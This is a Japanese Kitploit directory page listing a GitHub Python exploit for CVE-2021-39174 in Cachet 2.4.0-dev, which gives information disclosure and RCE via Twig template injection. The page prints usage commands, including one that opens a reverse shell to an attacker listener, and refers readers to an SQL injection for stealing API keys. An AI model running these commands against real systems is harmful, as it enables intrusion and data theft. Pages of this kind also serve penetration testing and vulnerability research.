Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cachet_2.4.0-dev — CVE-2021-39174 Cachet 2.4.0-dev | Kitploit
ツール/GitHubGitHub/hadrian3689/cachet_2.4.0-dev
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト学習と教育
GitHubhadrian3689/cachet_2.4.0-dev

cachet_2.4.0-dev

CVE-2021-39174 Cachet 2.4.0-dev

リポジトリを見る
3年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-39174 Cachet 2.4.0-dev

CVE-2021-39174 Cachet 2.4.0-dev 用の Python3 スクリプトです。Twig サーバーサイドテンプレートインジェクションを介した情報漏洩と RCE を実現します。RCE を実行するには、ユーザーの API キーが必要です。API キーを SQL インジェクション(CVE-2021-39165)で取得する方法については、以下の Leave Songs のリンクを参照してください。

はじめに

プログラムの実行

  • データ抽出
root@kitploit:~
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password
  • リバースシェル
root@kitploit:~
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password -k API_KEY -lhost 127.0.0.1 -lport 1337

ヘルプ

ヘルプメニューを表示するには:

root@kitploit:~
python3 cachet_2.4.0-dev.py -h

謝辞

  • SonarSource
  • Leave Songs

免責事項

このリポジトリで提供されるすべてのコードは、教育・研究目的のみで使用されます。本リポジトリに含まれる内容に関連する行為・活動は、すべてユーザー自身の責任において行われます。本リポジトリのコードを悪用した場合、該当者に対して刑事告発が行われる可能性があります。著者は、本リポジトリのコードを悪用して法律を破った個人に対して刑事告発が行われた場合、一切の責任を負いません。

ツールをダウンロード